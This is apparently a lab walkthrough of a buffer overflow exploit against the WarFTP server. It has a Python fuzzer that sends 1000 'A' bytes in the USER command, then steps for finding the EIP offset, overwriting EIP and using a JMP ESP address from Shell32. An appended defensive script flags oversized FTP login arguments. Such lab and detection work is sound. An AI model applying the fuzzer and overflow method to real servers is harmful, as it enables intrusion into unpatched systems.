2. Type the Python script contained in the guide book
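import socket

# Host and port are the ones used with nc in step 5
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.101", 21))
buffer = b"\x41" * 1000  # 1000 bytes of 0x41 ('A')
print("sending evil data via USER command...")
s.send(b"USER " + buffer + b"\r\n")
data = s.recv(1024)
s.send(b"PASS PASSWORD" + b"\r\n")
s.close()
print("Finish")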
3. Open the OllyDbg application and open the warftp file in OllyDbg
4. Click Debug > Run, and see the result
5. Open a terminal and type nc 192.168.56.101 21
6. Run pattern.txt
7. The result is hex code; for more detail, click View
8. Insert the code into the file that was made previously
9. Type #./pattern_offset.rb Aq4Aq5A
10. After that, run WarFTP again from OllyDbg and start the fuzzer. The result is like this. I have succeeded in changing the EIP register.
11. Click the Executable Modules menu
12. Use Shell32
13. Input the command JMP ESP
14. Run warftp using OllyDbg and run the fuzzer script. The result is this.
15. Open a browser and type 127.0.0.1:55555
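
The fuzzer in step 2 puts 1000 bytes into a single USER command, which stands out on the FTP control channel. The following is an added example, not from the original post or the guide book, that flags such commands in captured control-channel lines; the thresholds, function names and sample lines are constructed assumptions.

```python
import re

MAX_ARG_LEN = 128   # assumed limit: real usernames and passwords are far shorter
MAX_RUN_LEN = 32    # assumed limit for one byte repeated back to back
CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.DOTALL)

def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best

def inspect_command(line: bytes) -> list:
    """Return the reasons an FTP control line looks like an overflow attempt."""
    m = CMD_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return ["unparseable command"]
    verb, arg = m.group(1).upper(), m.group(2) or b""
    reasons = []
    if verb in (b"USER", b"PASS"):
        if len(arg) > MAX_ARG_LEN:
            reasons.append(f"{verb.decode()} argument is {len(arg)} bytes")
        if longest_run(arg) >= MAX_RUN_LEN:
            reasons.append("long run of one repeated byte")
        if any(b < 0x20 or b > 0x7E for b in arg):
            reasons.append("non-printable bytes in argument")
    return reasons

def scan(lines) -> dict:
    """Map the index of each suspicious line to its list of reasons."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = inspect_command(line)
        if reasons:
            hits[i] = reasons
    return hits

# Constructed sample traffic: a normal login, then the step 2 fuzzer's command
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"USER " + b"A" * 1000 + b"\r\n",
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE).items():
        print(idx, why)
```

A length check alone also catches a non-repeating pattern such as the one from pattern.txt, which the repeated-byte check would miss.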